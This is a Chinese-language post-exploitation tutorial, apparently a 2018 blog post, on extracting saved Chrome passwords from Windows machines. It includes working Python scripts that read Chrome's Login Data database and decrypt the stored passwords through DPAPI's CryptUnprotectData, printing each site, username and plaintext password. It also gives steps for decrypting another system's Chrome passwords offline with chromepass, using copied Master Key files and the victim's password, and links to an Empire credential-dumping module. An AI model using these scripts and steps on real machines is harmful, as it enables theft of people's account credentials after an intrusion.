圖片發自簡書App

前言

在后滲透階段，獲得權限后需要搜集目標系統的信息。信息越全面，越有助于進一步的滲透。對于Windows系統，用戶瀏覽器往往包含有價值的信息。

在之前的文章《本地密碼查看工具LaZagne中的自定義腳本開發》曾介紹過利用LaZagne導出多個瀏覽器密碼的方法。

本文將要針對Chrome瀏覽器，介紹具體的導出原理和利用方法，解決一個實際問題： 如何導出另一系統下Chrome瀏覽器中保存的密碼？

0x01 簡介

本文將要介紹以下內容：

Chrome瀏覽器保存密碼的方式

如何導出Chrome瀏覽器中保存的密碼

常用方法的限制

如何導出另一系統下Chrome瀏覽器中保存的密碼

0x02 Chrome瀏覽器保存密碼的方式

正常用戶在訪問網站時，可選擇使用Chrome瀏覽器保存登錄的用戶密碼，用于下次登錄的時候Chrome自動填寫登錄密碼，如下圖

Alt text

在Chrome中可以查看保存的登錄密碼(需要提供用戶口令)，如下圖

Alt text

Chrome中保存的密碼先被二次加密，然后被保存在SQLite數據庫文件中，位置如下：

%LocalAppData%\Google\Chrome\User Data\Default\Login Data

實際測試：

測試系統： Win7x86

Chrome版本： 63.0.3239.132

定位SQLite數據庫文件，位于C:\Users\a\AppData\Local\Google\Chrome\User Data\Default\Login Data

使用工具讀取數據庫文件，測試工具： SQLiteStudio

下載地址：

https://sqlitestudio.pl/index.rvt

注：

SQLiteStudio開源，特點是支持查看十六進制數據(SQLiteSpy不支持查看十六進制數據)

成功讀取數據庫文件保存的信息，但password段無法顯示，如下圖

Alt text

選擇Form view，查看十六進制格式，獲得二次加密后的用戶密碼，如下圖

Alt text

注：

如果Chrome正在運行，無法使用SQLiteStudio打開數據庫文件Login Data，可將該文件復制后再打開

0x03 導出Chrome瀏覽器中保存的密碼

首先，編寫程序實現讀取SQLite數據庫文件，這里選擇使用python實現

開源代碼很多，所以這里只給出一個示例

from os import getenv

import sqlite3

import binascii

conn = sqlite3.connect(getenv("APPDATA") + "\..\Local\Google\Chrome\User Data\Default\Login Data")

cursor = conn.cursor()

cursor.execute('SELECT action_url, username_value, password_value FROM logins')

for result in cursor.fetchall():

? ? print (binascii.b2a_hex(result[2]))

獲得二次加密的用戶密碼，如下圖

Alt text

參考Chromium開源代碼，找到Chrome做二次加密的方法： 通過Windows API CryptProtectData()實現

參考加密代碼：

https://github.com/scheib/chromium/blob/eb7e2441dd8878f733e43799ea77c2bab66816d3/chrome/browser/password_manager/password_store_win_unittest.cc#L107

CryptProtectData()的說明可參考：

https://msdn.microsoft.com/en-us/library/windows/desktop/aa380261(v=vs.85).aspx

獲得關鍵信息：

(1)對應解密函數為CryptUnprotectData

參考地址：

https://msdn.microsoft.com/en-us/library/windows/desktop/aa380882(v=vs.85).aspx

(2)只有與加密數據的用戶具有相同登錄憑據的用戶才能解密數據

也就是說，只能在當前用戶的憑據下解密數據

解密的開源代碼也有很多，這里給出一個示例：

from os import getenv

import sqlite3

import win32crypt

import binascii

conn = sqlite3.connect(getenv("APPDATA") + "\..\Local\Google\Chrome\User Data\Default\Login Data")

cursor = conn.cursor()

cursor.execute('SELECT action_url, username_value, password_value FROM logins')

for result in cursor.fetchall():

? ? password = win32crypt.CryptUnprotectData(result[2], None, None, None, 0)[1]

? ? print password

注：

調用win32crypt.CryptUnprotectData需要安裝pywin32

下載地址：

http://sourceforge.net/projects/pywin32/files/pywin32/Build%20219/pywin32-219.win32-py2.7.exe

執行后，還原用戶密碼，如下圖

Alt text

注：

如果Chrome正在運行，無法查詢數據庫文件Login Data，顯示sqlite3.OperationalError: database is locked

綜上，在實際導出的過程中，如果Chrome正在運行，需要先復制數據庫文件，再嘗試解密

0x04 如何導出另一系統下Chrome瀏覽器中保存的密碼

參照CryptProtectData()的說明，地址如下：

https://msdn.microsoft.com/en-us/library/windows/desktop/aa380261(v=vs.85).aspx

“Usually, the only user who can decrypt the data is a user with the same logon credentials as the user who encrypted the data.In addition, the encryption and decryption must be done on the same computer. “

是否可以斷定，無法在另一系統下導出Chrome瀏覽器中保存的密碼呢？

答案是否定的

Chrome密碼還原工具chromepass提供了一個特別的功能： Reading ChromePass passwords from external drive

chromepass下載地址：

http://www.nirsoft.net/utils/chromepass.html

說明如下：

“you can also read the passwords stored by Chrome Web browser from an external profile in your current operating system or from another external drive”

也就是說，使用chromepass能夠導出當前系統下另一用戶的Chrome密碼

操作界面如下圖

Alt text

既然如此，如果獲得了另一系統下的相關配置文件，能否導出Chrome瀏覽器中保存的密碼呢？

當然可以

解密需要獲得三部分內容：

加密密鑰(即Master Key文件)，位于%appdata%\Microsoft\Protect下對應sid文件夾下的文件

數據庫文件Login Data

用戶明文的密碼，用于解密加密密鑰

由于chromepass程序的設計問題，以上文件需要組成特定格式，子目錄格式如下：

\AppData\Local\Google\Chrome\User Data\Default\Login Data

\AppData\Roaming\Microsoft\Protect{sid}}\下保存key文件

注：

{sid}必須同原系統的對應

eg.

\AppData\Local\Google\Chrome\User Data\Default\Login Data

\AppData\Roaming\Microsoft\Protect\S-1-5-21-3453529135-4164765056-1075703908-1001\329c4147-0011-4ad6-829d-e32dcbd1bbd7

如下圖

Alt text

使用chromepass選擇該目錄，填入用戶明文密碼，如下圖

Alt text

成功解密，如下圖

Alt text

補充：

chromepass也可在命令行下使用

0x05 開源工具

解密當前系統下Chrome瀏覽器中保存的密碼，可供參考的工具：

命令行工具Chrome Password Dump，下載地址：

http://securityxploded.com/chrome-password-dump.php

powershell實現的工具：

https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/collection/Get-ChromeDump.ps1

python實現代碼，可供參考的開源代碼：

from os import getenv

import sqlite3

import win32crypt

import binascii

conn = sqlite3.connect(getenv("APPDATA") + "\..\Local\Google\Chrome\User Data\Default\Login Data")

cursor = conn.cursor()

cursor.execute('SELECT action_url, username_value, password_value FROM logins')

for result in cursor.fetchall():

? ? password = win32crypt.CryptUnprotectData(result[2], None, None, None, 0)[1]

? ? if password:

? ? ? ? print 'Site: ' + result[0]

? ? ? ? print 'Username: ' + result[1]

? ? ? ? print 'Password: ' + password

? ? else:

? ? ? ? print "no password found"

0x06 小結

本文介紹了導出Chrome瀏覽器密碼的原理和利用方法，成功解決一個實際問題： 通過加密密鑰文件和用戶明文密碼，能夠導出另一系統下Chrome瀏覽器中保存的密碼

如果只獲得了用戶密碼ntlm hash，能否導出呢？

LEAVE A REPLY

Written on January 25, 2018

?